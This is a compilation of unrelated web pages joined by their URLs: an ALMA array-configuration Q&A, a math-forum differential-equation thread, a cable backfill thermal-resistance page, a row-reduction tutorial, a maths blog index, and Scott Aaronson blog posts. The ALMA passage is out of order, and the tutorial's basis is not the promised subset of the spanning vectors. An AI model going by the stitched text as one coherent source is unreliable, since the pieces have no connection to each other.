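As a rough cross-check of the quoted numbers, the diffraction limit θ ≈ λ/B applied to the 3697 m maximum baseline at ~1.3 mm, projected to 450 light-years, gives a linear resolution of order 10 AU (the constants below are standard values; the true synthesized-beam size depends on the full baseline distribution, so this is only an order-of-magnitude sketch):

```python
AU = 1.496e11      # meters per astronomical unit
LY = 9.461e15      # meters per light-year
lam = 1.3e-3       # m, observing wavelength (~1.3 mm)
baseline = 3697.0  # m, longest baseline quoted in the paper
dist = 450 * LY    # distance to the Taurus star-forming region

theta = lam / baseline        # diffraction-limit estimate, radians
res_au = theta * dist / AU    # projected linear resolution at Taurus
print(round(res_au, 1))       # ≈ 10 AU; ~3x longer baselines reach a few AU
```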
Several years ago I remember reading about the design of ALMA and there are a lot more places to put dishes than there are dishes. I think there were five optimized configurations that all looked to have a similar spiral shape, but each one was maybe a factor of 2 or 3 larger than the previous.
Since the dishes take time to move and setup and calibrate, this probably doesn't happen that often.
Question: How often does it happen? How often do they move most of ALMA's dishes to change resolution?
If there's a site that shows how ALMA is set up now, and what the next setup will be and when, that would be great to know about as well.
above: "Until recently, protoplanetary disks were believed to be smooth, pancake-like objects. The results from this study show that some disks are more like doughnuts with holes, but even more often appear as a series of rings. The rings are likely carved by planets that are otherwise invisible to us." Source Credit: Feng Long/ALMA
The list of array configurations is given in the Proposers Guide and ten configurations have been defined for the 43 12-meter antennas. They have the form C43-x where x goes from 1 (most compact; 15-161 meter separation) to 10 (least compact; 244-16200 meter separation). The changes between configurations are shown in the Configuration Schedule; over the ~12 months of Cycle 6, it looks like they change configuration 14 times. There is a month-long "Antennae Relocation Shutdown" in May 2019 as they transition from fairly compact to least compact - presumably because it takes a longer time to move the 43 dishes out multiple kilometers.
http://mathhelpforum.com/differential-equations/177224-inhibited-growth.html | # Math Help - inhibited growth
1. ## inhibited growth
There is a problem in my textbook that is exactly like one of the examples, but just uses different numbers.
Problem: A tank initially contains 400 gal of brine in which 100 lbs of salt are dissolved. Brine containing 1/10 lb of salt per gallon is run into the tank at 20 gal/min, the mixture being drained off at the same rate. How many lbs of salt remain in the tank after 30 minutes?
In the example, we separate variables and integrate. I use the same method to solve this problem (it just has different numbers) and I get $40 - 60e^{-t/20}$. The book's answer is $40 + 60e^{-t/20}$.
What am I doing wrong?
2. I got it.
When going through the problem you deal with the quantity $\ln(40-x)$. But $40-x$ is negative at $t=0$ (since $x(0)=100$), so we must be dealing with $-(40-x) = x-40$.
3. Looks to me like you probably integrated
$\dfrac{1}{40-x}$ and got $\ln|40-x|,$ whereas you should have gotten $-\ln|40-x|.$ You have to do a $u$ substitution in order to use that rule!
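For anyone who wants to double-check the thread's conclusion, here is a quick numerical sketch (mine, not from the thread) comparing the book's closed-form answer $x(t) = 40 + 60e^{-t/20}$ against a direct Euler integration of the mixing equation $\frac{dx}{dt} = 2 - \frac{x}{20}$:

```python
import math

def salt_after(t_end, x0=100.0, dt=1e-4):
    """Euler-integrate dx/dt = 2 - x/20 (salt inflow minus outflow) from x(0) = x0."""
    x = x0
    for _ in range(int(t_end / dt)):
        x += (2.0 - x / 20.0) * dt
    return x

numeric = salt_after(30.0)
closed_form = 40.0 + 60.0 * math.exp(-30.0 / 20.0)  # about 53.39 lb of salt left
```

With a step of $10^{-4}$ the two values agree to several decimal places, which supports the $+$ sign in the book's answer (and the sign error diagnosed above).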
https://www.cableizer.com/documentation/R_CG/ | Thermal resistance of multi-layer backfill
Overall thermal resistance between buried cables in a multi-layer backfill and the ground surface.
All resistances $R_q$ are calculated once for the side with the shorter distance to the backfill boundary, and once for the other side. The resistances were defined in the paper by R. de Lieto Vollaro et al., 'Experimental study of thermal field deriving from an underground electrical power cable buried in non-homogeneous soils', 2014. The total resistance to ambient $T_{4iii}$ is calculated by taking the two values of $R_{CG}$ for the two sides in parallel.
Range of variability of the controlling parameters:
| Parameter | Unit | min | max |
|---|---|---|---|
| $s_{b1}$ | m | 0.048 | 0.16 |
| $s_{b2}$ | m | 0.2 | 1.5 |
| $s_{b3}$ | m | 0.3 | 1.3 |
| $w_b$ | m | 0.41 | 1.4 |
| $L_{b4}$ | m | 1.02 | 2.55 |
| $L_{cm}$ | m | 0.66 | 2.24 |
| $s_{b4}$ | m | 0.17 | 0.48 |
| $w_b/L_{b4}$ | - | 0.215 | 1.264 |
| $\rho_{b1}$ | K.m/W | 0.52 | 9.80 |
| $\rho_{b2}$ | K.m/W | 0.52 | 9.52 |
| $\rho_{b}$ | K.m/W | 0.52 | 7.14 |
| $\rho_{4}$ | K.m/W | 0.31 | 8.62 |
Within the range of variability given in the paper by R. de Lieto Vollaro et al., 'Thermal analysis of underground electrical power cables buried in non-homogeneous soils', 2011, the best fit of the numerical data for the overall thermal resistance $R_{CG}$ was derived by a Monte Carlo optimization method. The method has a 3.6 % standard deviation of error and a 10 % range of relative error at a 98 % level of confidence. The paper points out that if the trench is filled with a single backfilling material (i.e., $\rho_{b1}$ = $\rho_{b2}$ = $\rho_{b}$), so that the method from IEC 60287 can be applied, the range of relative error of the results obtained through the IEC method is +/- 35 %. Whenever the trench is filled with layers of different materials stacked one above the other, the only way to apply IEC 60287 is to replace the actual multiple filling of the trench with a single fictitious material having an equivalent thermal resistivity given by the weighted average of the thermal resistivities of the backfilling layers and the cable bedding, the weights being their thicknesses. In that case, the errors are noticeably higher, at +250 / -45 %, than those corresponding to the use of the multi-layer method.
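The fictitious single-material replacement described above is just a thickness-weighted average of the layer resistivities. A minimal sketch (the layer thicknesses and resistivities below are hypothetical values, not data from the paper):

```python
def equivalent_resistivity(layers):
    """Thickness-weighted average resistivity [K.m/W] of stacked layers.

    `layers` is a list of (thickness_m, resistivity) pairs for the
    bedding and backfilling layers, as in the IEC 60287 workaround.
    """
    total = sum(t for t, _ in layers)
    return sum(t * rho for t, rho in layers) / total

# hypothetical trench: 0.3 m bedding at 0.6, 0.5 m backfill at 1.2, 0.4 m layer at 2.5
rho_eq = equivalent_resistivity([(0.3, 0.6), (0.5, 1.2), (0.4, 2.5)])
```

The result always lies between the smallest and largest layer resistivity, which is exactly why this single-value replacement loses the multi-layer detail the paper's method retains.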
Symbol
$R_{CG}$
Unit
K.m/W
Formulae
$\frac{1}{\frac{1}{R_{q11}+R_{q12}+R_{q13}}+\frac{1}{R_{q21}+R_{q22}}+\frac{1}{R_{q31}+R_{q32}}}$
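The formula is a parallel combination of three series heat-flow paths. A minimal numeric sketch (the $R_q$ values here are placeholders, not results from the paper):

```python
def r_cg(paths):
    """Parallel combination of series heat-flow paths, as in the formula above.

    `paths` is a list of lists; each inner list holds the series
    resistances [K.m/W] along one path to the ground surface.
    """
    return 1.0 / sum(1.0 / sum(path) for path in paths)

# placeholder values for (R_q11 + R_q12 + R_q13), (R_q21 + R_q22), (R_q31 + R_q32)
r = r_cg([[0.4, 0.3, 0.2], [0.5, 0.4], [0.6, 0.3]])
```

Taking the two side values of $R_{CG}$ in parallel, as described above for $T_{4iii}$, is the same operation applied once more.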
Related
$R_{q11}$
$R_{q12}$
$R_{q13}$
$R_{q21}$
$R_{q22}$
$R_{q31}$
$R_{q32}$
$T_{4iii}$
Image
Arrangement, heat flow paths and thermal resistances of multi-layer backfill
https://astarmathsandphysics.com/university-maths-notes/matrices-and-linear-algebra/4350-reducing-a-matrix-to-row-reduced-echelon-form-to-find-a-basis-for-a-vector-space.html?tmpl=component&print=1&page= | Reducing a Matrix to Row Reduced Echelon Form to Find a Basis for a Vector Space
Suppose we have a vector space $V$, a subset of $\mathbb{R}^4$ spanned by the vectors

$\left\{ \begin{pmatrix}1\\2\\1\\2\end{pmatrix} , \begin{pmatrix}2\\1\\2\\1\end{pmatrix} , \begin{pmatrix}3\\2\\3\\2\end{pmatrix} , \begin{pmatrix}3\\3\\3\\3\end{pmatrix} , \begin{pmatrix}5\\3\\5\\3\end{pmatrix} \right\}$
We want to find a subset of this spanning set that is a basis for $V$.
From the set of vectors, form a matrix whose rows are these vectors.
$\left( \begin{array}{cccc} 1 & 2 & 1 & 2 \\ 2 & 1 & 2 & 1 \\ 3 & 2 & 3 & 2 \\ 3 & 3 & 3 & 3 \\ 5 & 3 & 5 & 3 \end{array} \right)$
Now perform elementary row operations - adding or subtracting multiples of each row, interchanging rows, or scaling rows - to find the row reduced echelon form of the matrix.
Subtract two times row 1 from row 2, subtract 3 times row 1 from rows 3 and 4, and subtract 5 times row 1 from row 5. We get
$\left( \begin{array}{cccc} 1 & 2 & 1 & 2 \\ 0 & -3 & 0 & -3 \\ 0 & -4 & 0 & -4 \\ 0 & -3 & 0 & -3 \\ 0 & -7 & 0 & -7 \end{array} \right)$
Divide row 2 by -3
$\left( \begin{array}{cccc} 1 & 2 & 1 & 2 \\ 0 & 1 & 0 & 1 \\ 0 & -4 & 0 & -4 \\ 0 & -3 & 0 & -3 \\ 0 & -7 & 0 & -7 \end{array} \right)$
Subtract two times row 2 from row 1, add four times row 2 to row 3, add three times row 2 to row 4, and add seven times row 2 to row 5.
$\left( \begin{array}{cccc} 1 & 0 & 1 & 0 \\ 0 & 1 & 0 & 1 \\ 0 & 0 & 0 & 0 \\ 0 & 0 & 0 & 0 \\ 0 & 0 & 0 & 0 \end{array} \right)$
This is the row reduced echelon form of the matrix.
A basis for $V$ is then

$\left\{ \begin{pmatrix}1\\0\\1\\0\end{pmatrix} , \begin{pmatrix}0\\1\\0\\1\end{pmatrix} \right\}$
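The reduction can be verified mechanically. A small self-contained sketch (my own helper using exact rational arithmetic, not code from the page) that row-reduces the matrix and reads off the nonzero rows as a basis for the row space:

```python
from fractions import Fraction

def rref(rows):
    """Return the row reduced echelon form of a matrix over the rationals."""
    m = [[Fraction(x) for x in row] for row in rows]
    nrows, ncols = len(m), len(m[0])
    pivot = 0
    for col in range(ncols):
        # find a row at or below `pivot` with a nonzero entry in this column
        pr = next((r for r in range(pivot, nrows) if m[r][col] != 0), None)
        if pr is None:
            continue
        m[pivot], m[pr] = m[pr], m[pivot]
        piv = m[pivot][col]
        m[pivot] = [x / piv for x in m[pivot]]  # scale pivot row to leading 1
        for r in range(nrows):
            if r != pivot and m[r][col] != 0:  # clear the column elsewhere
                f = m[r][col]
                m[r] = [a - f * b for a, b in zip(m[r], m[pivot])]
        pivot += 1
        if pivot == nrows:
            break
    return m

spanning = [[1, 2, 1, 2], [2, 1, 2, 1], [3, 2, 3, 2], [3, 3, 3, 3], [5, 3, 5, 3]]
basis = [row for row in rref(spanning) if any(x != 0 for x in row)]
```

The two nonzero rows recovered, $(1,0,1,0)$ and $(0,1,0,1)$, match the hand computation.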
https://www.flyingcoloursmaths.co.uk/blog/page/10/ | # The Flying Colours Maths Blog: Latest posts
## Proofs
A question that comes up a lot in class is, “how do you get good at proofs?” (It’s usually framed as “I don’t like proofs”, but we’re not having any of that negativity here, thank you very much.) I don’t have a silver bullet for that. I do have some
## Ask Uncle Colin: A horrible CDF
Dear Uncle Colin I have the set-up below - how do I find the cumulative distribution function for $d^2$? - Circles Don’t Fit Hi, CDF, and thanks for your message! Before I start, I’m going to make two simplifying assumptions that don’t change anything - that the radius of the
## Dictionary of Mathematical Eponymy: Noether’s Theorem
We’ve just reached the halfway point of the Dictionary of Mathematical Eponymy project, and it’s time for a fairly famous one (and again, one I’ve been meaning to understand better). What is Noether’s Theorem? Emmy Noether has several theorems named for her, but the first (and probably most important) can
## Ask Uncle Colin: Dividing by halves
Dear Uncle Colin, Why is dividing by a half the same as doubling? - How Arithmetic Leverages Fractions Hi, HALF, and thanks for your message! I’m going to give a couple of reasons: first, the algebra of it, then the logic. Algebra Let’s set this up as $\frac{x}{\left(\frac{1}{2}\right)} = y$
## “How many days old are you?”
“How old are you?” asked young Fred. (This is not, technically, an ‘Ask Uncle Colin’. It’s an ‘Ask Daddy’.) “I’m 42, buddy.” “42 days?” “No, 42 years!” “Oh. But how many days is that?” It is not quite 7:15am on New Year’s Day. I have not yet had my coffee.
## Wrong, but Useful: Episode 75
In episode 75 of Wrong, but Useful, we talk with @astrastefania, who is Stefania Delprete in real life. We discuss: Dreams about Maths and doing Maths in lucid dreams Goodreads maths reading challenge Newsletters I like: Stuff Evelyn Wants You To Read by @evelynjlamb and Fair Warning by @SophieWarnes
## A “Components” Enigma
Dear Uncle Colin, Help! I’m working on a top-secret project somewhere in Buckinghamshire. I can tell you that it involves… components. The… machine has three slots for components, and there are five different components available (one of each) - so there are 60 ways to arrange the components. There’s a
## A few logarithmic tricks
I love a good logarithm. Logarithms are a standby for when I want to work something out ninja-style, and there’s something very satisfying about taking something horrible in the powers, bringing it down to the working line, and finding that it wasn’t so horrible after all. I’m an old hand,
https://www.scottaaronson.com/blog/?cat=11 | ## Archive for the ‘Nerd Interest’ Category
### Review of “Inadequate Equilibria,” by Eliezer Yudkowsky
Thursday, November 16th, 2017
Inadequate Equilibria: Where and How Civilizations Get Stuck is a little gem of a book: wise, funny, and best of all useful (and just made available for free on the web). Eliezer Yudkowsky and I haven’t always agreed about everything, but on the subject of bureaucracies and how they fail, his insights are gold. This book is one of the finest things he’s written. It helped me reflect on my own choices in life, and it will help you reflect on yours.
The book is a 120-page meditation on a question that’s obsessed me as much as it’s obsessed Yudkowsky. Namely: when, if ever, is it rationally justifiable to act as if you know better than our civilization’s “leading experts”? And if you go that route, then how do you answer the voices—not least, the voices in your own head—that call you arrogant, hubristic, even a potential crackpot?
Yudkowsky gives a nuanced answer. To summarize, he argues that contrarianism usually won’t work if your goal is to outcompete many other actors in a free market for a scarce resource that they all want too, like money or status or fame. In those situations, you really should ask yourself why, if your idea is so wonderful, it’s not already being implemented. On the other hand, contrarianism can make sense when the “authoritative institutions” of a given field have screwed-up incentives that prevent them from adopting sensible policies—when even many of the actual experts might know that you’re right, but something prevents them from acting on their knowledge. So for example, if a random blogger offers a detailed argument for why the Bank of Japan is pursuing an insane fiscal policy, it’s a-priori plausible that the random blogger could be right and the Bank of Japan could be wrong (as actually happened in a case Yudkowsky recounts), since even insiders who knew the blogger was right would find it difficult to act on their knowledge. The same wouldn’t be true if the random blogger said that IBM stock was mispriced or that P≠NP is easy to prove.
The high point of the book is a 50-page dialogue between two humans and an extraterrestrial visitor. The extraterrestrial is confused about a single point: why are thousands of babies in the United States dying every year, or suffering permanent brain damage, because (this seems actually to be true…) the FDA won’t approve an intravenous baby food with the right mix of fats in it? Just to answer that one question, the humans end up having to take the alien on a horror tour through what’s broken all across the modern world, from politicians to voters to journalists to granting agencies, explaining Nash equilibrium after Nash equilibrium that leaves everybody worse off but that no one can unilaterally break out of.
I do have two criticisms of the book, both relatively minor compared to what I loved about it.
First, Yudkowsky is brilliant in explaining how institutions can produce terrible outcomes even when all the individuals in them are smart and well-intentioned—but he doesn’t address the question of whether we even need to invoke those mechanisms for more than a small minority of cases. In my own experience struggling against bureaucracies that made life hellish for no reason, I’d say that about 2/3 of the time my quest for answers really did terminate at an identifiable “empty skull”: i.e., a single individual who could unilaterally solve the problem at no cost to anyone, but chose not to. It simply wasn’t the case, I don’t think, that I would’ve been equally obstinate in the bureaucrat’s place, or that any of my friends or colleagues would’ve been. I simply had to accept that I was now face-to-face with an alien sub-intelligence—i.e., with a mind that fetishized rules made up by not-very-thoughtful humans over demonstrable realities of the external world.
Second, I think the quality of the book noticeably declines in the last third. Here Yudkowsky recounts conversations in which he tried to give people advice, but he redacts all the object-level details of the conversations—so the reader is left thinking that this advice would be good for some possible values of the missing details, and terrible for other possible values! So then it’s hard to take away much of value.
In more detail, Yudkowsky writes:
“If you want to use experiment to show that a certain theory or methodology fails, you need to give advocates of the theory/methodology a chance to say beforehand what they think they predict, so the prediction is on the record and neither side can move the goalposts.”
I only partly agree with this statement (which might be my first substantive disagreement in the book…).
Yes, the advocates should be given a chance to say what they think the theory predicts, but then their answer need not be taken as dispositive. For if the advocates are taken to have ultimate say over what their theory predicts, then they have almost unlimited room to twist themselves in pretzels to explain why, yes, we all know this particular experiment will probably yield such-and-such result, but contrary to appearances it won’t affect the theory at all. For science to work, theories need to have a certain autonomy from their creators and advocates—to be “rigid,” as David Deutsch puts it—so that anyone can see what they predict, and the advocates don’t need to be continually consulted about it. Of course this needs to be balanced, in practice, against the fact that the advocates probably understand how to use the theory better than anyone else, but it’s a real consideration as well.
In one conversation, Yudkowsky presents himself as telling startup founders not to bother putting their prototype in front of users, until they have a testable hypothesis that can be confirmed or ruled out by the users’ reactions. I confess to more sympathy here with the startup founders than with Yudkowsky. It does seem like an excellent idea to get a product in front of users as early as possible, and to observe their reactions to it: crucially, not just a binary answer (do they like the product or not), confirming or refuting a prediction, but more importantly, reactions that you hadn’t even thought to ask about. (E.g., that the cool features of your website never even enter into the assessment of it, because people can’t figure out how to create an account, or some such.)
More broadly, I’d stress the value of the exploratory phase in science—the phase where you just play around with your system and see what happens, without necessarily knowing yet what hypothesis you want to test. Indeed, this phase is often what leads to formulating a testable hypothesis.
But let me step back from these quibbles, to address something more interesting: what can I, personally, take from Inadequate Equilibria? Is academic theoretical computer science broken/inadequate in the same way a lot of other institutions are? Well, it seems to me that we have some built-in advantages that keep us from being as broken as we might otherwise be. For one thing, we’re overflowing with well-defined problems, which anyone, including a total outsider, can get credit for solving. (Of course, the “outsider” might not retain that status for long.) For another, we have no Institutional Review Boards and don’t need any expensive equipment, so the cost to enter the field is close to zero. Still, we could clearly be doing better: why didn’t we invent Bitcoin? Why didn’t we invent quantum computing? (We did lay some of the intellectual foundations for both of them, but why did it take people outside TCS to go the distance?) Do we value mathematical pyrotechnics too highly compared to simple but revolutionary insights? It’s worth noting that a whole conference, Innovations in Theoretical Computer Science, was explicitly founded to try to address that problem—but while ITCS is a lovely conference that I’ve happily participated in, it doesn’t seem to have succeeded at changing community norms much. Instead, ITCS itself converged to look a lot like the rest of the field.
Now for a still more pointed question: am I, personally, too conformist or status-conscious? I think even “conformist” choices I’ve made, like staying in academia, can be defended as the right ones for what I wanted to do with my life, just as Eliezer’s non-conformist choices (e.g., dropping out of high school) can be defended as the right ones for what he wanted to do with his. On the other hand, my acute awareness of social status, and when I lacked any—in contrast to what Eliezer calls his “status blindness,” something that I see as a tremendous gift—did indeed make my life unnecessarily miserable in all sorts of ways.
Anyway, go read Inadequate Equilibria, then venture into the world and look for some $20 bills lying on the street. And if you find any, come back and leave a comment on this post explaining where they are, so a conformist herd can follow you.

### Not the critic who counts

Wednesday, October 11th, 2017

There’s a website called Stop Timothy Gowers! !!! —yes, that’s the precise name, including the exclamation points. The site is run by a mathematician who for years went under the pseudonym “owl / sowa,” but who’s since outed himself as Nikolai Ivanov.

For those who don’t know, Sir Timothy Gowers is a Fields Medalist, known for seminal contributions including the construction of Banach spaces with strange properties, the introduction of the Gowers norm, explicit bounds for the regularity lemma, and more—but who’s known at least as well for explaining math, in his blog, books, essays, MathOverflow, and elsewhere, in a remarkably clear, friendly, and accessible way. He’s also been a leader in the fight to free academia from predatory publishers. So why on earth would a person like that need to be stopped?

According to sowa, because Gowers, along with other disreputable characters like Terry Tao and Endre Szemerédi and the late Paul Erdös, represents a dangerous style of doing mathematics: a style that’s just as enamored of concrete problems as it is of abstract theory-building, and that doesn’t even mind connections to other fields like theoretical computer science. If that style becomes popular with young people, it will prevent faculty positions and prestigious prizes from going to the only deserving kind of mathematics: the kind exemplified by Bourbaki and by Alexander Grothendieck, which builds up theoretical frameworks with principled disdain for the solving of simple-to-state problems. Mathematical prizes going to the wrong people—or even going to the right people but presented by the wrong people—are constant preoccupations of sowa’s.
Read his blog and let me know if I’ve unfairly characterized it.

Now for something totally unrelated. I recently discovered a forum on Reddit called SneerClub, which, as its name suggests, is devoted to sneering. At whom? Basically, at anyone who writes anything nice about nerds or Silicon Valley, or who’s associated with the “rationalist community,” or the Effective Altruist movement, or futurism or AI risk. Typical targets include Scott Alexander, Eliezer Yudkowsky, Robin Hanson, Michael Vassar, Julia Galef, Paul Graham, Ray Kurzweil, Elon Musk … and with a list like that, I guess I should be honored to be a regular target too.

The basic SneerClub M.O. is to seize on a sentence that, when ripped from context and reflected through enough hermeneutic funhouse mirrors, can make nerds out to look like right-wing villains, oppressing the downtrodden with rays of disgusting white maleness (even, it seems, ones who aren’t actually white or male). So even if the nerd under discussion turns out to be, say, a leftist or a major donor to anti-Trump causes or malaria prevention or whatever, readers can feel reassured that their preexisting contempt was morally justified after all.

Thus: Eliezer Yudkowsky once wrote a piece of fiction in which a character, breaking the fourth wall, comments that another character seems to have no reason to be in the story. This shows that Eliezer is a fascist who sees people unlike himself as having no reason to exist, and who’d probably exterminate them if he could. Or: many rationalist nerds spend a lot of effort arguing against Trumpists, alt-righters, and neoreactionaries. The fact that they interact with those people, in order to rebut them, shows that they’re probably closet neoreactionaries themselves.

When I browse sites like “Stop Timothy Gowers! !!!” or SneerClub, I tend to get depressed about the world—and yet I keep browsing, out of a fascination that I don’t fully understand.
I ask myself: how can a person read Gowers’s blog, or Slate Star Codex, without seeing what I see, which is basically luminous beacons of intellectual honesty and curiosity and clear thought and sparkling prose and charity to dissenting views, shining out far across the darkness of online discourse? (Incidentally, Gowers lists “Stop Timothy Gowers! !!!” in his blogroll, and I likewise learned of SneerClub only because Scott Alexander linked to it.) I’m well aware that this very question will only prompt more sneers. From the sneerers’ perspective, they and their friends are the beacons, while Gowers or Scott Alexander are the darkness. How could a neutral observer possibly decide who was right?

But then I reflect that there’s at least one glaring asymmetry between the sides. If you read Timothy Gowers’s blog, one thing you’ll constantly notice is mathematics. When he’s not weighing in on current events—for example, writing against Brexit, Elsevier, or the destruction of a math department by cost-cutting bureaucrats—Gowers is usually found delighting in exploring a new problem, or finding a new way to explain a known result. Often, as with his dialogue with John Baez and others about the recent “p=t” breakthrough, Gowers is struggling to understand an unfamiliar piece of mathematics—and, completely unafraid of looking like an undergrad rather than a Fields Medalist, he simply shares each step of his journey, mistakes and all, inviting you to follow for as long as you can keep up. Personally, I find it electrifying: why can’t all mathematicians write like that?

By contrast, when you read sowa’s blog, for all the anger about the sullying of mathematics by unworthy practitioners, there’s a striking absence of mathematical exposition. Not once does sowa ever say: “OK, forget about the controversy. Since you’re here, instead of just telling you about the epochal greatness of Grothendieck, let me walk you through an example.
Let me share a beautiful little insight that came out of his approach, in so self-contained a way that even a physicist or computer scientist will understand it.” In other words, sowa never uses his blog to do what Gowers does every day. Sowa might respond that that’s what papers are for—but the thing about a blog is that it gives you the chance to reach a much wider readership than your papers do. If someone is already blogging anyway, why wouldn’t they seize that chance to share something they love?

Similar comments apply to Slate Star Codex versus r/SneerClub. When I read an SSC post, even if I vehemently disagree with the central thesis (which, yes, happens sometimes), I always leave the diner intellectually sated. For the rest of the day, my brain is bloated with new historical tidbits, or a deep-dive into the effects of a psychiatric drug I’d never heard of, or a jaw-dropping firsthand account of life as a medical resident, or a different way to think about a philosophical problem—or, if nothing else, some wicked puns and turns of phrase.

But when I visit r/SneerClub—well, I get exactly what’s advertised on the tin. Once you’ve read a few, the sneers become pretty predictable. I thought that for sure, I’d occasionally find something like: “look, we all agree that Eliezer Yudkowsky and Elon Musk and Nick Bostrom are talking out their asses about AI, and are coddled white male emotional toddlers to boot. But even granting that, what do we think about AI? Are intelligences vastly smarter than humans possible? If not, then what principle rules them out? What, if anything, can be said about what a superintelligent being would do, or want? Just for fun, let’s explore this a little: I mean the actual questions themselves, not the psychological reasons why others explore them.” That never happens. Why not?
There’s another fascinating Reddit forum called “RoastMe”, where people submit a photo of themselves holding a sign expressing their desire to be “roasted”—and then hundreds of Redditors duly oblige, savagely mocking the person’s appearance and anything else they can learn about the person from their profile. Many of the roasts are so merciless that one winces vicariously for the poor schmucks who signed up for this, and hopes that they won’t be driven to self-harm or suicide. But browse enough roasts, and a realization starts to sink in: there’s no person, however beautiful or interesting they might’ve seemed a priori, for whom this roasting can’t be accomplished. And that very generality makes the roasting lose much of its power—which maybe, optimistically, was the point of the whole exercise?

In the same way, spend a few days browsing SneerClub, and the truth hits you: once you’ve made their enemies list, there’s nothing you could possibly say or do that they wouldn’t sneer at. Like, say it’s a nice day outside, and someone will reply: “holy crap how much of an entitled nerdbro do you have to be, to erase all the marginalized people for whom the day is anything but ‘nice’—or who might be unable to go outside at all, because of limited mobility or other factors never even considered in these little rich white boys’ geek utopia?”

For me, this realization is liberating. If appeasement of those who hate you is doomed to fail, why bother even embarking on it? I’ve spent a lot of time on this blog criticizing D-Wave, and cringeworthy popular articles about quantum computing, and touted arXiv preprints that say wrong things. But I hope regular readers feel like I’ve also tried to offer something positive: y’know, actual progress in quantum computing that actually excites me, or a talk about big numbers, or an explanation of the Bekenstein bound, whatever. My experience with sites like “Stop Timothy Gowers!
!!!” and SneerClub makes me feel like I ought to be doing less criticizing and more positive stuff. Why, because I fear turning into a sneerer myself? No, it’s subtler than that: because reading the sneerers drives home for me that it’s a fool’s quest to try to become what Scott Alexander once called an “apex predator of the signalling world.” At the risk of stating the obvious: if you write, for example, that Richard Feynman was a self-aggrandizing chauvinist showboater, then even if your remarks have a nonzero inner product with the truth, you don’t thereby “transcend” Feynman and stand above him, in the same way that set theory transcends and stands above arithmetic by constructing a model for it. Feynman’s achievements don’t thereby become your achievements.

When I was in college, I devoured Ray Monk’s two-volume biography of Bertrand Russell. This is a superb work of scholarship, which I warmly recommend to everyone. But there’s one problem with it: Monk is constantly harping on his subject’s failures, and he has no sense of humor, and Russell does. The result is that, whenever Monk quotes Russell’s personal letters at length to prove what a jerk Russell was, the quoted passages just leap off the page—as if old Bertie has come back from the dead to share a laugh with you, the reader, while his biographer looks on sternly and says, “you two think this is funny?”

For a writer, I can think of no higher aspiration than that: to write like Bertrand Russell or like Scott Alexander—in such a way that, even when people quote you to stand above you, your words break free of the imprisoning quotation marks, wiggle past the critics, and enter the minds of readers of your generation and of generations not yet born.

Update (Nov.
13): Since apparently some people didn’t know (?!), the title of this post comes from the famous Teddy Roosevelt quote:

It is not the critic who counts; not the man who points out how the strong man stumbles, or where the doer of deeds could have done them better. The credit belongs to the man who is actually in the arena, whose face is marred by dust and sweat and blood; who strives valiantly; who errs, who comes short again and again, because there is no effort without error and shortcoming; but who does actually strive to do the deeds; who knows great enthusiasms, the great devotions; who spends himself in a worthy cause; who at the best knows in the end the triumph of high achievement, and who at the worst, if he fails, at least fails while daring greatly, so that his place shall never be with those cold and timid souls who neither know victory nor defeat.

### Coming to Nerd Central

Sunday, October 8th, 2017

While I’m generally on sabbatical in Tel Aviv this year, I’ll be in the Bay Area from Saturday Oct. 14 through Wednesday Oct. 18, where I look forward to seeing many friends new and old. On Wednesday evening, I’ll be giving a public talk in Berkeley, through the Simons Institute’s “Theoretically Speaking” series, entitled Black Holes, Firewalls, and the Limits of Quantum Computers. I hope to see at least a few of you there! (I do have readers in the Bay Area, don’t I?)

But there’s more: on Saturday Oct. 14, I’m thinking of having a first-ever Shtetl-Optimized meetup, somewhere near the Berkeley campus. Which will also be a Slate Star Codex meetup, because Scott Alexander will be there too. We haven’t figured out many details yet, except that it will definitely involve getting fruit smoothies from one of the places I remember as a grad student. 
Possible discussion topics include what the math, CS, and physics research communities could be doing better; how to advance Enlightenment values in an age of recrudescent totalitarianism; and (if we’re feeling really ambitious) the interpretation of quantum mechanics. If you’re interested, shoot me an email to let me know if there are times that don’t work; then other Scott and I will figure out a plan and make an announcement.

On an unrelated note, some people might enjoy my answer to a MathOverflow question about why one should’ve expected number theory to be so rife with ridiculously easy-to-state yet hard-to-prove conjectures, like Fermat’s Last Theorem and the Goldbach Conjecture. As I’ve discussed on this blog before, I’ve been deeply impressed with MathOverflow since the beginning, but never more so than today, when a decision to close the question as “off-topic” was rightfully overruled. If there’s any idea that unites all theoretical computer scientists, I’d say it’s the idea that what makes a given kind of mathematics “easy” or “hard” is, itself, a proper subject for mathematical inquiry.

### Also against individual IQ worries

Sunday, October 1st, 2017

Scott Alexander recently blogged “Against Individual IQ Worries.” Apparently, he gets many readers writing to him terrified that they scored too low on an IQ test, and therefore they’ll never be able to pursue their chosen career, or be a full-fledged intellectual or member of the rationalist community or whatever. Amusingly, other Scott says, some of these readers have even performed their own detailed Bayesian analysis of what it might mean that their IQ score is only 90, cogently weighing the arguments and counterarguments while deploying the full vocabulary of statistical research. It somehow reminds me of the joke about the talking dog, who frets to his owner that he doesn’t think he’s articulate enough to justify all the media attention he’s getting. 
I’ve long had mixed feelings about the entire concept of IQ. On the one hand, I know all the studies that show that IQ is highly heritable, that it’s predictive of all sorts of life outcomes, etc. etc. I’m also aware of the practical benefits of IQ research, many of which put anti-IQ leftists into an uncomfortable position: for example, the world might never have understood the risks of lead poisoning without studies showing how it depressed IQ. And as for the thousands of writers who dismiss the concept of IQ in favor of grit, multiple intelligences, emotional intelligence, or whatever else is the flavor of the week … well, I can fully agree about the importance of the latter qualities, but can’t go along with many of those writers’ barely-concealed impulse to lower the social status of STEM nerds even further, or to enforce a world where the things nerds are good at don’t matter.

On the other hand … well, have you actually looked at an IQ test? To anyone with a scientific or mathematical bent, the tests are vaguely horrifying. “Which of these pictures is unlike the others?” “What number comes next in the sequence?” Question after question that could have multiple defensible answers, but only one that “counts”—and that, therefore, mostly tests the social skill of reverse-engineering what the test-writer had in mind. As a teacher, I’d be embarrassed to put such questions on an exam.

I sometimes get asked what my IQ is. The truth is that, as far as I know, I was given one official IQ test, when I was four years old, and my score was about 106. The tester earnestly explained to my parents that, while I scored off the chart on some subtests, I completely bombed others, and averaging yielded 106. As a representative example of what I got wrong, the tester offered my parents the following:

Tester: “Suppose you came home, and you saw smoke coming out of your neighbor’s roof. 
What would you do?”

Me: “Probably nothing, because it’s just the chimney, and they have a fire in their fireplace.”

Tester: “OK, but suppose it wasn’t the chimney.”

Me: “Well then, I’d either call for help or not, depending on how much I liked my neighbor…”

Apparently, my parents later consulted other psychologists who were of the opinion that my IQ was higher. But the point remains: if IQ is defined as your score on a professionally administered IQ test, then mine is about 106.

